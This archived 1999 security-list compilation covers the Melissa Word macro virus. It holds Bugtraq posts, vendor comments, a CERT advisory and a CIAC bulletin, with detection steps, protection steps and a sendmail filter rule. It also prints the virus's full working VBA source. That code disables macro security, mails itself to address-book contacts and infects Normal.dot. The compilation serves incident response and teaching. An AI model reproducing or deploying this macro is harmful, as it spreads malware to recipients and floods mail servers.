exploit the possibilities

melissa.macro.virus.txt

melissa.macro.virus.txt
Posted Aug 17, 1999

I am not going to make a habit of posting virus alerts, but this analysis of the fast spreading Melissa virus, including full source code, merits a posting. Excellent job by Nate Lawson of root.org

tags | exploit, root, virus
MD5 | 5fe5025944f1b46cfb6e77027470049e

melissa.macro.virus.txt

Change Mirror Download
Date: Fri, 26 Mar 1999 17:05:51 -0800
From: Aleph One <aleph1@UNDERGROUND.ORG>
To: BUGTRAQ@netspace.org
Subject: Melissa Macro Virus

I normally don't allow virus posts through the list as they seldom represent
a new threat, just a new example of an already existing one, but this one
is getting enough play to warrant a message.

There is a new Word macro virus circulating called Melissa. The virus
propagates via email. Attached to the email is a Word file that when
opened will launch a macro that will send the same message to the first
50 recipients of your Outlook address book. The subject line is
"important Message From <some user name>". The body consist of the text
"Here is that document you asked for... don't show anyone else;-)".
The infected documents contains passwords to porn web sites.

For more information check out: http://vil.mcafee.com/vil/vm10120.asp

As this thing is emailing itself to everyone under the sun virus vendors
should have no problem obtaining copies to analyze. If anyone wants a copy
send me a message.


--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 18:01:13 -0800
From: Nate Lawson <nate@ROOT.ORG>
To: BUGTRAQ@netspace.org
Subject: Melissa virus code

Sorry to add one more message to this. I placed the code up on my site,
formatted so that it is readable.

http://www.root.org/

-Nate

[http://www.root.org/melissa_virus.txt]

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If


Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If

If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If

'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 17:51:49 -0800
From: Nate Lawson <nate@ROOT.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

Here is my analysis of how the virus works. The McAfee article aleph1
posted neglects to mention that it infects the active document and
Normal.dot

1. Check for Word security controls and disable them:
Word 2000
Macro.Security... = FALSE
Word 97
Options.ConfirmConversions = 0
Options.VirusProtection = 0
Options.SaveNormalPrompt = 0

2. See if machine is already infected
Check HKCU\Software\Microsoft\Office\Melissa? for the string "... by
Kwyjibo"

3. If it wasn't already infected, go through the Outlook addressbook and
send mail to the first 50 names
Subject: Important Message From <Full Name>
Body: Here is that document you asked for... don't show anyone else
;-)
Attachment: itself, named "list.doc"

After sending the mail, add the registry key to disable further
infection.

4. Open the Active Document and Normal.dot and infect them with itself

5. On the way out, check if the current day equals the current minute.
If so, print "Twenty-two points, plus triple-word-score, plus fifty points
for using all my letters. Game's over. I'm outta here."

It does not appear to do anything malicious other than shutting down your
mail server with tons of mail as users start opening the attachment. It
appears the virus vendors have a patch out now. To avoid infection,
disable macros when opening any Word document or just don't open the
attachment. Thanks to Josh Siegel for sending me the code.

-Nate

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 19:00:35 -0800
From: "Kuo, Jimmy" <Jimmy_Kuo@NAI.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

Nate Lawson does a wonderful writeup to which I will make minor
clarifications:
>Here is my analysis of how the virus works. The McAfee article aleph1
>posted neglects to mention that it infects the active document and
>Normal.dot

[Hide face]
In all the clamor over the spreading aspect, we forgot to tell people that
it's a normal macro virus in all other means. And that if you don't have
Outlook, breath calm. But if you do have Outlook, WATCH OUT!

"infects the active document" is redundant. It's infected. That's what
starts this.

>1. Check for Word security controls and disable them:
> Word 2000
> Macro.Security... = FALSE
> Word 97
> Options.ConfirmConversions = 0
> Options.VirusProtection = 0
> Options.SaveNormalPrompt = 0

>2. See if machine is already infected
> Check HKCU\Software\Microsoft\Office\Melissa? for the string "... by
>Kwyjibo"

>3. If it wasn't already infected, go through the Outlook addressbook and
>send mail to the first 50 names

First 50 names of every addressbook.

And the kicker? Look at the first 50 names in your address books? How many
mailing lists are there?

> Subject: Important Message From <Full Name>
> Body: Here is that document you asked for... don't show anyone else
>;-)

> Attachment: itself, named "list.doc"

This time. We have discovered that it was posted to alt.sex in a file named
LIST.ZIP.

> After sending the mail, add the registry key to disable further
>infection.

Disables future mailings. Infections can happen again. But the email blast
will happen only the first time, unless you clean the registry. So we
recommend that you do not remove that element of the registry.

>4. Open the Active Document and Normal.dot and infect them with itself

>5. On the way out, check if the current day equals the current minute.
>If so, print "Twenty-two points, plus triple-word-score, plus fifty points
>for using all my letters. Game's over. I'm outta here."

>It does not appear to do anything malicious other than shutting down your
>mail server with tons of mail as users start opening the attachment. It
>appears the virus vendors have a patch out now. To avoid infection,
>disable macros when opening any Word document or just don't open the
>attachment. Thanks to Josh Siegel for sending me the code.

Good ideas.

Jimmy Kuo
Director, AV Research, Network Associates
(or as he says, McAfee)
jkuo@nai.com

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 19:24:47 -0800
From: Aaron Wood <awood@CS.WASHINGTON.EDU>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: Re: [BugTraq] Melissa Macro Virus (fwd)


On a lighter side...


MSNBC speculates as to the origin of the Hackers name.

"Kwyjibo appears to be a reference to a "Simpsons" TV show episode in
which Bart Simpson wins a Scrabble game by spelling out the word Kwyjibo.
The virus also includes a line from that episode: "Twenty-two points, plus
triple-word-score, plus fifty points for using all my letters. Game's over.
I'm outta here."


AW


-----Original Message-----
>From: Dan Schrader [mailto:Dan_Schrader@trendmicro.com]
Sent: Friday, March 26, 1999 6:56 PM
To: 'Aaron Wood'; NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Subject: RE: [BugTraq] Melissa Macro Virus (fwd)


This is a serious event. A number of major companies - including Microsoft
and Intel have told the press that they had to temporarily shut down their
e-mail systems due to this virus. At least 25 major companies have
contacted Trend Micro about this today alone.

Trend Micro has a free tool for scanning your exchange servers to ensure
that they are not harboring any infected documents. The tool, called
HouseCall for Microsoft Exchange is available at:

http://housecall.antivirus.com/smex_housecall/
<http://housecall.antivirus.com/smex_housecall/>

This detects, but does not cure infected files. HouseCall for Exchange is
an ActiveX Control - so you need Microsoft IE with security settings set to
medium or low to run it. Considering this audience, I suspect you will want
to remember to set those settings back when you are done.

Trend also offers a tool for scanning individual machines
http://housecall.antivirus.com
<http://housecall.antivirus.com/smex_housecall/>

Virus Description:

This virus works with both Word 97 and Word 2000 and the macro activates
when an infected document is closed. If it is activated in Word 2000, it
will lower the security setting to the lowest level by modifying the
registry and will disable the Word menu commands (Macro\Security) which
allows the user to reinstate security settings. In Word97, the virus
disables the Tools/Macro menu commands, the Confirm Conversions option, the
MS Word macro virus protection, and the Save Normal Template prompt. The
virus then checks to see if the registry key
"HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?" contains the value ".
. . by Kwyjibo." This is how the virus determines whether it has activated
on this system.

The virus then opens Outlook, if present on the system, and sends one email
for each address list. The email may contain up to 50 recipients. The email
will contain the subject line: "Important Message From {user name}" and the
message body will be "Here is that document you asked for . . . don't show
anyone else :-)" The virus then attaches a copy of the infected active
document to the outgoing mail. The name of the original infected attachment
was List.doc, but it could be any name.

If the user does not have Outlook, the virus will not work. Then the virus
modifies the value of the registry key mentioned above so it is equal to ".
. . by Kwijibo" -- indicating that it has successfully activated on this
computer. After that, the virus checks to see if the normal template and
active document are infected, and if either is not, it infects the file.
Finally, if the day of the month is equal to the minute (for example, if it
is March 26 at 3:26 pm), the virus will type the following text on the
active document: "Twenty-two points, plus triple-word-score, plus fifty
points for using all my letters. Game's over. I'm outta here."

Trend Micro has detection for this virus in its latest pattern update,
"510". Users are encouraged to download and install this latest pattern
update. The protection will also be included in the regular weekly update.

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 07:07:20 -0500
From: CERT Advisory <cert-advisory@cert.org>
Reply-To: cert-advisory-request@cert.org
To: cert-advisory@coal.cert.org
Subject: CERT Advisory CA-99.04 - Melissa Macro Virus

-----BEGIN PGP SIGNED MESSAGE-----

CERT Advisory CA-99-04-Melissa-Macro-Virus

Original issue date: Saturday March 27 1999
Last Revised: Saturday March 27, 1999

Systems Affected

* Machines with Microsoft Word 97 or Word 2000
* Any mail handling system could experience performance problems or
a denial of service as a result of the propagation of this macro
virus.

Overview

At approximately 2:00 PM GMT-5 on Friday March 26 1999 we began
receiving reports of a Microsoft Word 97 and Word 2000 macro virus
which is propagating via email attachments. The number and variety of
reports we have received indicate that this is a widespread attack
affecting a variety of sites.

Our analysis of this macro virus indicates that human action (in the
form of a user opening an infected Word document) is required for this
virus to propagate. It is possible that under some mailer
configurations, a user might automatically open an infected document
received in the form of an email attachment. This macro virus is not
known to exploit any new vulnerabilities. While the primary transport
mechanism of this virus is via email, any way of transferring files
can also propagate the virus.

Anti-virus software vendors have called this macro virus the Melissa
macro or W97M_Melissa virus.

I. Description

The Melissa macro virus propagates in the form of an email message
containing an infected Word document as an attachment. The transport
message has most frequently been reported to contain the following
Subject header

Subject: Important Message From <name>

Where <name> is the full name of the user sending the message.

The body of the message is a multipart MIME message containing two
sections. The first section of the message (Content-Type: text/plain)
contains the following text.

Here is that document you asked for ... don't show anyone else ;-)

The next section (Content-Type: application/msword) was initially
reported to be a document called "list.doc". This document contains
references to pornographic web sites. As this macro virus spreads we
are likely to see documents with other names. In fact, under certain
conditions the virus may generate attachments with documents created
by the victim.

When a user opens an infected .doc file with Microsoft Word97 or
Word2000, the macro virus is immediately executed if macros are
enabled.

Upon execution, the virus first lowers the macro security settings to
permit all macros to run when documents are opened in the future.
Therefore, the user will not be notified when the virus is executed in
the future.

The macro then checks to see if the registry key

"HKEY_Current_User\Software\Microsoft\Office\Melissa?"

has a value of "... by Kwyjibo". If that registry key does not exist
or does not have a value of "... by Kwyjibo", the virus proceeds to
propagate itself by sending an email message in the format described
above to the first 50 entries in every MAPI address book readable by
the user executing the macro. Keep in mind that if any of these email
addresses are mailing lists, the message will be delivered to everyone
on the mailing lists. In order to successfully propagate, the affected
machine must have Microsoft Outlook installed; however, Outlook does
not need to be the mailer used to read the message.

Next, the macro virus sets the value of the registry key to "... by
Kwyjibo". Setting this registry key causes the virus to only propagate
once per session. If the registry key does not persist through
sessions, the virus will propagate as described above once per every
session when a user opens an infected document. If the registry key
persists through sessions, the virus will no longer attempt to
propagate even if the affected user opens an infected document.

The macro then infects the Normal.dot template file. By default, all
Word documents utilize the Normal.dot template; thus, any newly
created Word document will be infected. Because unpatched versions of
Word97 may trust macros in templates the virus may execute without
warning. For more information please see:

http://www.microsoft.com/security/bulletins/ms99-002.asp

Finally, if the minute of the hour matches the day of the month at
this point, the macro inserts into the current document the message
"Twenty-two points, plus triple-word-score, plus fifty points for
using all my letters. Game's over. I'm outta here."

Note that if you open an infected document with macros disabled and
look at the list of macros in this document, neither Word97 nor
Word2000 list the macro. The code is actually VBA (Visual Basic for
Applications) code associated with the "document.open" method. You can
see the code by going into the Visual Basic editor.

If you receive one of these messages, keep in mind that the message
came from someone who is affected by this virus and they are not
necessarily targeting you. We encourage you to contact any users from
which you have received such a message. Also, we are interested in
understanding the scope of this activity; therefore, we would
appreciate if you would report any instance of this activity to us
according to our Incident Reporting Guidelines document available at:

http://www.cert.org/tech_tips/incident_reporting.html

II. Impact

* Users who open an infected document in Word97 or Word2000 with
macros enabled will infect the Normal.dot template causing any
documents referencing this template to be infected with this macro
virus. If the infected document is opened by another user, the
document, including the macro virus, will propagate. Note that
this could cause the user's document to be propagated instead of
the original document, and thereby leak sensitive information.

* Indirectly, this virus could cause a denial of service on mail
servers. Many large sites have reported performance problems with
their mail servers as a result of the propagation of this virus.

III. Solutions

* Block messages with the signature of this virus at your mail transfer
agents.

With Sendmail

Nick Christenson of sendmail.com provided information about
configuring sendmail to filter out messages that may contain the
Melissa virus. This information is available from the follow URL:
ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-m
elissa-filter.txt

* Utilize virus scanners

Most virus scanning tools will detect and clean macro viruses. In
order to detect and clean current viruses you must keep your
scanning tools up to date with the latest definition files.

+ McAfee / Network Associates

http://vil.mcafee.com/vil/vm10120.asp
http://www.avertlabs.com/public/datafiles/valerts/vinfo/melissa.asp

+ Symantec

http://www.symantec.com/avcenter/venc/data/mailissa.html

+ Trend Micro

http://housecall.antivirus.com/smex_housecall/technotes.html

* Encourage users at your site to disable macros in Microsoft Word

Notify all of your users of the problem and encourage them to
disable macros in Word. You may also wish to encourage users to
disable macros in any product that contains a macro language as
this sort of problem is not limited to Microsoft Word.

In Word97 you can disable automatic macro execution (click
Tools/Options/General then turn on the 'Macro virus protection'
checkbox). In Word2000 macro execution is controlled by a security
level variable similar to Internet Explorer (click on
Tools/Macro/Security and choose High, Medium, or Low). In that
case, 'High' silently ignores the VBA code, Medium prompts in the
way Word97 does to let you enable or disable the VBA code, and
'Low' just runs it.

Word2000 supports Authenticode on the VB code. In the 'High'
setting you can specify sites that you trust and code from those
sites will run.

* General protection from Word Macro Viruses

For information about macro viruses in general, we encourage you
to review the document "Free Macro AntiVirus Techniques" by Chengi
Jimmy Kuo which is available at.

http://www.nai.com/services/support/vr/free.asp

Acknowledgements

We would like to thank Jimmy Kuo of Network Associates, Eric Allman
and Nick Christenson of sendmail.com, Dan Schrader of Trend Micro, and
Jason Garms and Karan Khanna of Microsoft for providing information
used in this advisory.

Additionally we would like to thank the many sites who reported this
activity.
______________________________________________________________________

This document is available from:
http://www.cert.org/advisories/CA-99-04-Melissa-Macro-Virus.html.
______________________________________________________________________

CERT/CC Contact Information

Email: cert@cert.org
Phone: +1 412-268-7090 (24-hour hotline)
Fax: +1 412-268-6989
Postal address:
CERT Coordination Center
Software Engineering Institute
Carnegie Mellon University
Pittsburgh PA 15213-3890
U.S.A.

CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
Monday through Friday; they are on call for emergencies during other
hours, on U.S. holidays, and on weekends.

Using encryption

We strongly urge you to encrypt sensitive information sent by email.
Our public PGP key is available from http://www.cert.org/CERT_PGP.key.
If you prefer to use DES, please call the CERT hotline for more
information.

Getting security information

CERT publications and other security information are available from
our web site http://www.cert.org/.

To be added to our mailing list for advisories and bulletins, send
email to cert-advisory-request@cert.org and include SUBSCRIBE
your-email-address in the subject of your message.

Copyright 1999 Carnegie Mellon University.
Conditions for use, disclaimers, and sponsorship information can be
found in http://www.cert.org/legal_stuff.html.

* "CERT" and "CERT Coordination Center" are registered in the U.S.
Patent and Trademark Office
______________________________________________________________________

NO WARRANTY
Any material furnished by Carnegie Mellon University and the Software
Engineering Institute is furnished on an "as is" basis. Carnegie
Mellon University makes no warranties of any kind, either expressed or
implied as to any matter including, but not limited to, warranty of
fitness for a particular purpose or merchantability, exclusivity or
results obtained from use of the material. Carnegie Mellon University
does not make any warranty of any kind with respect to freedom from
patent, trademark, or copyright infringement.
______________________________________________________________________

Revision History

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNvy9H3VP+x0t4w7BAQG1ggP7B8ItzTRpkP2O8JK7olIOdmn072PIZZxE
mJDW+A9fLDvRZQlVDSsFz/aH8ivmhor5ZbvtT14OmfIZWvxYdFnbO/s2WYL7+fV5
jL6mSb4AJ6lRXIYii+t22V0lvqJdP6VRFqy9EibpMtU2dhgFYf3TKX5e6wajOmBx
bZ6Ef5jPilA=
=aABH
-----END PGP SIGNATURE-----

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 20:20:13 -0800
From: Jim Reavis <jreavis@SECURITYPORTAL.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Melissa Macro Virus

The one thing I would like to add is that the virus code actually walks
through every available address list and grabs 50 recipients off of each for
a separate message, so if your Outlook client is attached to an Exchange
Server, it will hit the Global Address List and other available containers,
where it may find large distribution lists.

I will shortly have my analysis up at http://securityportal.com/

Jim Reavis
SecurityPortal.com - The focal point for security on the Net
jreavis@SecurityPortal.com

----------------------------------------------------------------------------

Date: Sat, 27 Mar 1999 12:45:38 -0800 (PST)
From: CIAC Mail User <ciac@rumpole.llnl.gov>
To: ciac-bulletin@rumpole.llnl.gov
Subject: CIAC Bulletin J-037: W97M.Melissa Word Macro Virus

[ For Public Release ]
-----BEGIN PGP SIGNED MESSAGE-----


__________________________________________________________

The U.S. Department of Energy
Computer Incident Advisory Capability
___ __ __ _ ___
/ | /_\ /
\___ __|__ / \ \___
__________________________________________________________

INFORMATION BULLETIN

W97M.Melissa Word Macro Virus

March 27, 1999 17:00 GMT Number J-037
_____________________________________________________________________________
PROBLEM: A new Word 97 macro virus named W97M.Malissa has been detected
at multiple DOE sites and is known to be spreading widely. The
virus uses Microsoft Outlook to e-mail the infected document
to the first 50 people from each of your Outlook address books.
PLATFORM: Windows 95 or Windows NT running Microsoft Word 97 (version 8)
or Word 2000 (version 9) and Microsoft Outlook. Word 98 on the
Macintosh is probably not vulnerable because the virus uses
the Windows registry, but that has not been verified yet.
Outlook Express and other mail readers are not vulnerable.
DAMAGE: It overwrites the first macro in open documents and in the
normal.dot template with the macro virus code. It turns off
macro detection in Word. It sends copies of the infected
document to up to 50 people from each of your Outlook address
books.
SOLUTION: Use an updated antivirus product. Some vendors have a solution
available but in many cases you must go to the vendors web
site to get it. Do not depend on the automatic or live update
feature of an antivirus package to get the detector for this
virus. Additional precautions are to password protect the
normal.dot file, turn on macro virus detection in Word, and DO
NOT OPEN attachments to mail messages with the subject
"Important Message From " and the contents "Here is that
document you asked for ... don't show anyone else ;-)" without
checking with the sender. Alert your computer security
officers if you receive such messages.
_____________________________________________________________________________
VULNERABILITY Risk of infection is high. This virus is spreading widely
ASSESSMENT: within and without of the DOE complex. The risk of damage to
your system is low because most users do not have macros in
files and would be alerted by Word's macro detector. The risk
of lostproductivity and lost mail messages is high as mail
servers may have to be shut down and purged of infected mail
messages.
_____________________________________________________________________________
CIAC has critical information about the W97M.Melissa Word Macro Virus

The W97M.Malissa Word macro virus has been seen within the DOE complex. This
macro virus attaches to Word objects in Word 97 and Word 2000. Because of
this method of infection, this virus will not infect older versions of
Microsoft Word. When an infected document is opened, the virus checks to
see if Word 97 or Word 2000 is installed and then disables the Macro
toolbar.
It then disables the following Word options:

Confirm conversions at open.
Macro virus protection.
Prompt to save Normal template.

Disabling these options makes it difficult to detect the virus in action. The
virus next checks the value of the private registry string:

HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?

If that string is not equal to "... by Kwyjibo" the virus sends copies of the
infected document to the first 50 people in each of your Outlook address
books and then sets the registry key so it does not do this again. It sends
copies of the infected document to others by opening a connection to Microsoft
Outlook and creating an e-mail message with the subject:

Important Message From <username>

where <username> is replaced with the current Word user's name (Tools, Options
command, User Information tab). The body of the message contains the following
text:

Here is that document you asked for ... don't show anyone else ;-)

The virus then inserts the first 50 users from your Outlook address book,
attaches the infected document and sends the message. It does this for however
many address books you have defined in Outlook.

After sending itself to the people in your address books, the virus then
checks to see if it is running on a document or the Normal.dot template. If
it is running on a document, it infects the Normal.dot template with a
Document_Close macro that runs whenever a document is closed. If it is
running on the Normal.dot template, it infects the active document with a
Document_Open macro that runs whenever a document is opened. After the
Normal.dot template is infected, the virus infects every document you work
on as soon as you close them. If you share these documents with anyone, you
will spread the virus.

Finally, if the minute of the hour equals the day of the month, the virus
inserts the following message at the current location in the active document.

Twenty-two points, plus triple-word-score, plus fifty points for using
all my letters. Game's over. I'm outta here.

Detecting The Virus
===================

Several antivirus vendors have a detection and cleaning capability for this
virus; however, you must go to the vendors web site to get the scanner
updates. Scanners with automatic or live update features do not yet get the
update required to find and clean this virus. While we expect the detection
strings to be in the automatic updates in the near future, for the next
week or two you should get the scanner directly from your vendor's web site.
We have verified that the Norton Antivirus updater obtained from the
Symantec web site (http://www.symantec.com/techsupp/custom/mailissa.html)
does detect the virus, the current live update does not. We have reliable
information that McAfee (http://vil.mcafee.com/vil/vm10120.asp), and
Trend Micro (http://housecall.antivirus.com/smex_housecall/technotes.html)
also have detection capabilities.

If you receive an e-mail with the following subject and body, DO NOT OPEN the
attachment.

Subject:
Important Message From <username>
Body:
Here is that document you asked for ... don't show anyone else ;-)

Make sure the sender is someone you know and then ask them if they really
sent you the attachment before opening it. If they did not send it, do not
open the attachment and contact your computer security manager. The most
common name for the attached file is list1.doc but that name can change.

If the following text appears in a document without your putting it there,
your normal.dot template is infected and your Word program is infecting all
documents when you close them.

Twenty-two points, plus triple-word-score, plus fifty points for using
all my letters. Game's over. I'm outta here.


Another option to see if a system has been infected is to use Regedit and
search for the following registry key:

HKEY_CURRENT_USER\Software\Microsoft\Office\Melissa?

If that key exists and has the value "... by Kwyjibo" the system has been
infected at some time. Note that the infection may have been removed without
deleting the key. This key can be deleted, but does no damage if left alone.

Protecting A System
===================

The first step in protecting a system is to have a current antivirus package
running on your system. Be sure to update it at least once a month. Many of
the newer antivirus scanners have the capability to automatically update
themselves every couple of weeks.

To protect Word from this and other Word macro viruses, first insure that Word
has been patched with the Word 97 Template vulnerability patch
(http://www.microsoft.com/security/bulletins/ms99-002.asp); second, the
normal.dot template file should be password protected; and third, the
following Word 97 options should be enabled.

Confirm conversions at open.
Macro virus protection.
Prompt to save Normal template.

Password Protecting The Normal.dot File
- - - - - ---------------------------------------

To password protect the Normal.dot file in Word 97, perform these steps:

1. Start Word.
2. Choose the Tools, Macro, Visual Basic Editor command.
3. In the Project window of the Visual Basic Editor, click on Normal.
4. Choose the Tools, Normal Properties command, Protection tab.
5. Check the Lock Project for Viewing check box and type in a password twice.
6. Close the dialog box, close the Visual Basic editor.
7. Quit Word.

The next time you start Word, the normal.dot template will be protected.

WARNING: If you ever have to type in the password to make changes to the
normal.dot file be aware that the file remains unprotected until you quit
Word and restart it.

Turning On Macro Virus Protection and Other Options
- ---------------------------------------------------

Some simple macro virus protection is built into Word 97. It does not detect
specific macro viruses but only informs you if macros exist on a document you
are trying to open. Macros detected by Macro Virus Protection are not
necessarily a virus. However, if you are alerted to a macro attached to a
document you should be extremely wary because most people do not have macros
attached to their documents.

Other options to set are:

Confirm conversions at open. This makes Word display a dialog box if
it is converting a document from one format to another.

Prompt to save Normal template. This makes Word display a dialog box
asking you to confirm changes to the Normal.dot template. Most
macro viruses hide in Normal.dot so this lets you know that there
has been a change that you may want to prevent. Changes also occur
when you change the default font or one of the built-in styles.


To turn on macro virus protection and these other options, perform these
steps:

1. Start Word.
2. Choose the Tools, Options command, General tab.
3. Check the Macro Virus Protection check box.
4. Check the Confirm conversions at open check box.
5. Choose the Save tab.
6. Check the Prompt to save Normal template check box.
4. Close the dialog box.

Whenever you open a document that contains macros, the macro virus protection
opens a dialog box telling you that there are macros in the document and
giving you the option to: Open the document with the macros enabled, open
the document without the macros, or cancel the open operation. You should
only open a document with macros enabled if you are expecting there to be
macros on that document and you know what they are supposed to do.

Detecting the Virus With a Mail Server
======================================

If a site has been infected you may need to block the virus infected mail
messages with your mail servers. The following filter was written by Scott
Hutton (Lead Security Engineer, Information Technology Security Office) of
Indiana University. As Scott mentions, this filter blocks all messages with
the text "Important Message From" in the subject line, which may block
messages that do not contain the virus. Use this filter at your own
discretion.

===== start included text ======
We blocked this on our mail relays through the following additions to
the sendmail.cf:

HSubject: $>CheckSubject
SCheckSubject
RImportant Message From $+ $#error $: 553 Subject Error
R$* $@ OK

Don't forget that there are tabs before $#error and $@ OK. This will
block any message where the subject begins with "Important Message
>From ...", which may be too rash of an action at your site.

===== end included text ======

Another filter was obtained by the CERT team from Nick Christenson of
sendmail.com

ftp://ftp.cert.org/pub/cert_advisories/Patches/CA-99-04-sendmail-melissa-
filter.txt
_____________________________________________________________________________
Thanks to Scott Hutton for the preliminary analysis and for a sendmail
filter. Thanks to CERT and Nick Christenson of sendmail.com for another
sendmail filter.
_____________________________________________________________________________

CIAC, the Computer Incident Advisory Capability, is the computer
security incident response team for the U.S. Department of Energy
(DOE) and the emergency backup response team for the National
Institutes of Health (NIH). CIAC is located at the Lawrence Livermore
National Laboratory in Livermore, California. CIAC is also a founding
member of FIRST, the Forum of Incident Response and Security Teams, a
global organization established to foster cooperation and coordination
among computer security teams worldwide.

CIAC services are available to DOE, DOE contractors, and the NIH. CIAC
can be contacted at:
Voice: +1 925-422-8193
FAX: +1 925-423-8002
STU-III: +1 925-423-2604
E-mail: ciac@llnl.gov

For emergencies and off-hour assistance, DOE, DOE contractor sites,
and the NIH may contact CIAC 24-hours a day. During off hours (5PM -
8AM PST), call the CIAC voice number 925-422-8193 and leave a message,
or call 800-759-7243 (800-SKY-PAGE) to send a Sky Page. CIAC has two
Sky Page PIN numbers, the primary PIN number, 8550070, is for the CIAC
duty person, and the secondary PIN number, 8550074 is for the CIAC
Project Leader.

Previous CIAC notices, anti-virus software, and other information are
available from the CIAC Computer Security Archive.

World Wide Web: http://www.ciac.org/
(or http://ciac.llnl.gov -- they're the same machine)
Anonymous FTP: ftp.ciac.org
(or ciac.llnl.gov -- they're the same machine)
Modem access: +1 (925) 423-4753 (28.8K baud)
+1 (925) 423-3331 (28.8K baud)

CIAC has several self-subscribing mailing lists for electronic
publications:
1. CIAC-BULLETIN for Advisories, highest priority - time critical
information and Bulletins, important computer security information;
2. SPI-ANNOUNCE for official news about Security Profile Inspector
(SPI) software updates, new features, distribution and
availability;
3. SPI-NOTES, for discussion of problems and solutions regarding the
use of SPI products.

Our mailing lists are managed by a public domain software package
called Majordomo, which ignores E-mail header subject lines. To
subscribe (add yourself) to one of our mailing lists, send the
following request as the E-mail message body, substituting
ciac-bulletin, spi-announce OR spi-notes for list-name:

E-mail to ciac-listproc@llnl.gov or majordomo@tholia.llnl.gov:
subscribe list-name
e.g., subscribe ciac-bulletin

You will receive an acknowledgment email immediately with a confirmation
that you will need to mail back to the addresses above, as per the
instructions in the email. This is a partial protection to make sure
you are really the one who asked to be signed up for the list in question.

If you include the word 'help' in the body of an email to the above address,
it will also send back an information file on how to subscribe/unsubscribe,
get past issues of CIAC bulletins via email, etc.

PLEASE NOTE: Many users outside of the DOE, ESnet, and NIH computing
communities receive CIAC bulletins. If you are not part of these
communities, please contact your agency's response team to report
incidents. Your agency's team will coordinate with CIAC. The Forum of
Incident Response and Security Teams (FIRST) is a world-wide
organization. A list of FIRST member organizations and their
constituencies can be obtained via WWW at http://www.first.org/.

